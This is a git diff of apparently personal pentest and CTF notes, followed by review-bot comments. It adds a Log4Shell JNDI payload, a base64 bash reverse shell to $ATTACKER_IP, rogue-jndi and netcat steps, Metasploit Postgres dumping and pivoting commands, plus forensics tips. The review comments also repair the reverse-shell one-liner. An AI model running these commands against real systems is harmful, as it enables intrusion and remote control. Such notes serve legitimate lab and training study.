diff --git a/Exploits/Java/Log4Shell.md b/Exploits/Java/Log4Shell.md index 9768e5e..0e9cc5d 100644 --- a/Exploits/Java/Log4Shell.md +++ b/Exploits/Java/Log4Shell.md @@ -131,3 +131,35 @@ ${${::-j}ndi:rmi://attackerendpoint.com/} SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true" 10.10.90.21210.10.90.212 ``` + +## Tipps, Tricks & other Tools + +* Use tcpdump to catch a possible connection +```sh +tcpdump -i port 389 +``` + * While the payload may look like this +```java +"${jndi:ldap://$ATTACKER_IP/check}" +``` + +### Use Veracode's Tools + +* Clone [veracode's rogue-jndi](https://github.com/veracode-research/rogue-jndi) and build jar with maven +```sh +cd rogue-jndi +mvn package +``` +* Prepare a reverse shell +```sh +echo 'bash -c bash -i >& /dev/tcp/$ATTACKER_IP/4711 0>&1' | base64 +``` +* Run the server +```sh +java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,}|{base64,-d}|{bash,-i}" --hostname "$ATTACKER_IP" +``` +* Select and use the payload from the displayed strings +* Catch the reverse shell with something like netcat +```sh +nc -lvnp 4711 +``` diff --git a/Exploits/Web/WASM.md b/Exploits/Web/WASM.md new file mode 100644 index 0000000..3f277dc --- /dev/null +++ b/Exploits/Web/WASM.md @@ -0,0 +1,12 @@ +# Web Assembly + +## Debugger + +Use live debuggin capabilities of [Cetus](https://github.com/Qwokka/Cetus.git). Install it through chrome://extensions. After the installation, Cetus is located in the dev tools as a tab + +### Cetus Search function + +* Search for modified values and get their address values +* Do a differential search -> search once without any value followed by a search where the operator (LT, NE, GT) is changed, still without a value in the search field. + + diff --git a/Forensics/Android.md b/Forensics/Android.md new file mode 100644 index 0000000..d32db1c --- /dev/null +++ b/Forensics/Android.md 
@@ -0,0 +1,8 @@ +# Android + +## Android Backups + +* Restore a backup by making a tar file out of it via +```sh +( printf "\x1f\x8b\x08\x00\x00\x00\x00\x00" ; tail -c +25 backup.ab ) | tar xfvz +``` diff --git a/Forensics/Malware.md b/Forensics/Malware.md new file mode 100644 index 0000000..957dfda --- /dev/null +++ b/Forensics/Malware.md @@ -0,0 +1,9 @@ +# Malware + +## Tools + +[Detect is Easy | DIE](https://github.com/horsicq/Detect-It-Easy) + +* Analyze with `capa ` +* Unpack with `upx` +* Re-analyze after deleting the cache `del .viv` diff --git a/Forensics/Volatility.md b/Forensics/Volatility.md index 3809f95..fc08f46 100644 --- a/Forensics/Volatility.md +++ b/Forensics/Volatility.md @@ -56,6 +56,7 @@ volatility -f windows.vadyarascan * Dump memory map ```sh volatility -f windows.memmap.Memmap --pid --dump +volatility -f windows.dumpfiles --pid ``` * Dump and scan files diff --git a/Miscellaneous/Metasploit.md b/Miscellaneous/Metasploit.md index 4d8c381..30a6303 100644 --- a/Miscellaneous/Metasploit.md +++ b/Miscellaneous/Metasploit.md @@ -12,6 +12,7 @@ * __Post__ postexploitation ## Notes + * Search via scope ```sh search type:auxiliary @@ -26,10 +27,12 @@ run -z * Flush via `unset all` ## Sessions + * `background` or `ctrl+z` * Foreground via `sessions -i ` ## Scanning + * Portscan ```sh search portscan @@ -41,6 +44,7 @@ search portscan * HTTP version `scanner/http/http_version` ## Database + * Start postgres * `msfdb init` * `db_status` @@ -50,11 +54,27 @@ search portscan * Show `services` * Set RHOST values via `hosts -R` +### Database Operations + +* Dump schemas +```sh +use auxiliary/scanner/postgres_schemadump +run postgres://$DB_USER:$DB_PASS@172.10.0.42/postgres +``` + +* Select table +```sh +use auxiliary/admin/postgres/postgres_sql +run postgres://$DB_USER:$DB_PASS@172.10.0.42/postgres sql='select * from users' +``` + ## Exploits + * `show targets` * `show payloads` ## Reverse Shells + * Multihandler, set options ```sh use exploit/multi/handler 
@@ -66,6 +86,7 @@ use multi/http/apache_mod_cgi_bash_env_exec ``` ## Post Exploitation + * `load kiwi` * `load python` * Windows @@ -82,6 +103,7 @@ use multi/http/apache_mod_cgi_bash_env_exec * `use post/linux/gather/hashdump` ## Other Meterpreter stuff + * Staged and in disguise running as another servicename ``` getpid diff --git a/Post Exploitation/Pivoting.md b/Post Exploitation/Pivoting.md index 9e97431..95c7293 100644 --- a/Post Exploitation/Pivoting.md +++ b/Post Exploitation/Pivoting.md @@ -197,6 +197,7 @@ portfwd add -l 22 -p 22 -r 127.0.0.1 run get_local_subnets background route add 10.1.1.0 255.255.255.0 1 +route add 172.10.0.1/32 -1 route print ``` * Or use `load auto_add_route` from [rapid7's documentation](https://www.rapid7.com/blog/post/2010/02/09/automatically-routing-through-new-subnets/) @@ -219,6 +220,11 @@ run use auxiliary/server/socks_proxy ``` * Set proxychain on attacker accordingly +```sh +run srvhost=127.0.0.1 srvport=9050 version=4a +curl --proxy socks4a:localhost:9050 +proxychains -q nmap 10.10.47.11 +``` ### rpivot
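Review bot: in the Exploits/Java/Log4Shell.md hunk, `tcpdump -i port 389` is missing the interface argument, so tcpdump takes `port` as the interface name and exits; write `tcpdump -i any port 389` (or the real interface), and make the port match whatever the rogue-jndi listener is actually started on, otherwise the capture stays empty even when the callback fires. The reverse-shell preparation has two problems: the single quotes in `echo 'bash -c bash -i >& /dev/tcp/$ATTACKER_IP/4711 0>&1'` keep `$ATTACKER_IP` from expanding, and `bash -c bash -i ...` runs `bash -c "bash"` with `-i` as `$0`, so the redirections never reach an interactive shell; `echo "bash -i >& /dev/tcp/$ATTACKER_IP/4711 0>&1" | base64 -w0` is what the later `{echo,}|{base64,-d}|{bash,-i}` chain expects (`-w0` matters, because a wrapped base64 string contains newlines that break the brace-expansion form). In the `java -jar ... --command "bash -c {echo,}|{base64,-d}|{bash,-i}"` line the slot after `echo,` is empty; mark it as a placeholder such as `{echo,<BASE64>}` so nobody runs it verbatim. Minor: heading `Tipps` should read `Tips`.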
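Review bot: in the new Exploits/Web/WASM.md, `debuggin` should be `debugging` and the title should be `WebAssembly` (one word). The differential-search bullet is hard to follow as written; spell out the order of operations, e.g. run a search with the value field empty to take a baseline, change the value in the running application, then search again with the operator switched to LT, GT or NE and the field still empty, so that only addresses whose contents moved in that direction survive. "Install it through chrome://extensions" should also say which install path is meant (for instance developer mode plus loading the cloned directory unpacked), since the page gives a git URL rather than a store link.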
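Review bot: in the new Forensics/Android.md, `tar xfvz` has no archive operand; with old-style option letters `f` consumes the next argument, so tar errors out instead of reading the pipe. Use `tar xvfz -` (or `tar xzvf -`). Add the caveat that `tail -c +25` and the prepended 8-byte gzip header only work for an unencrypted backup (fourth header line `none`); an encrypted `.ab` has a longer header and must be decrypted first. The heading text "Restore a backup" is misleading, because the command extracts the backup into files on the analyst's machine rather than restoring it to a device; "Extract a backup" fits.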
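Review bot: in the new Forensics/Malware.md, the tool is called "Detect It Easy" (`Detect is Easy` is a typo), and the three bullets below the link are about capa and UPX, not DIE, so give them their own item or heading. `capa ` has a trailing space where the sample path belongs; write `capa <sample>`. `upx` alone does not unpack anything, decompression is `upx -d <sample>`. For the cache line, say what `.viv` is (the vivisect workspace capa writes next to the sample as `<sample>.viv`) and note that `del` is the Windows cmd builtin, `rm` on Linux.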
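Review bot: in the Forensics/Volatility.md hunk, the added `volatility -f windows.dumpfiles --pid` is placed inside the "Dump memory map" code block, but it dumps files, so it belongs under the "Dump and scan files" bullet that follows. The line also lacks the image path after `-f` and a value after `--pid`; the existing memmap line has the same gaps, but the new line should not copy them: `volatility -f <image> windows.dumpfiles --pid <pid>`.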
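Review bot: in the Miscellaneous/Metasploit.md "Database Operations" hunk, the module path `auxiliary/scanner/postgres_schemadump` is missing the `postgres/` directory; it should be `auxiliary/scanner/postgres/postgres_schemadump`, matching the `auxiliary/admin/postgres/postgres_sql` path used in the next bullet. The "Select table" bullet actually runs arbitrary SQL through the `sql=` option, so "Run SQL" describes it better. Also note that `172.10.0.42` is not in the RFC 1918 `172.16.0.0/12` block; if this is a lab address it is fine, otherwise use a private or documentation range.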
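Review bot: in the Post Exploitation/Pivoting.md route hunk, `route add 172.10.0.1/32 -1` uses `-1` as the gateway where the line above uses the session id `1`; if `-1` is meant as "the most recently opened session", say so in a short comment, otherwise use the actual session id, because a reader will not know whether the two lines are alternatives or a typo. The CIDR form next to the netmask form on the previous line is fine but worth a word, since the page so far only shows `route add <net> <mask> <session>`.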
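Review bot: in the Post Exploitation/Pivoting.md socks_proxy hunk, `run srvhost=127.0.0.1 srvport=9050 version=4a` is an msfconsole command, so it belongs before the "Set proxychain on attacker accordingly" bullet rather than inside the attacker-side block. `curl --proxy socks4a:localhost:9050` has no target URL and the proxy spec needs a scheme separator: `curl --proxy socks4a://127.0.0.1:9050 http://10.10.47.11/`. For `proxychains -q nmap 10.10.47.11`, add `-sT -Pn` (and usually `-n`), because SYN scans and ICMP host discovery do not go through a SOCKS proxy and produce misleading results, and mention that proxychains.conf must carry a matching `socks4 127.0.0.1 9050` entry.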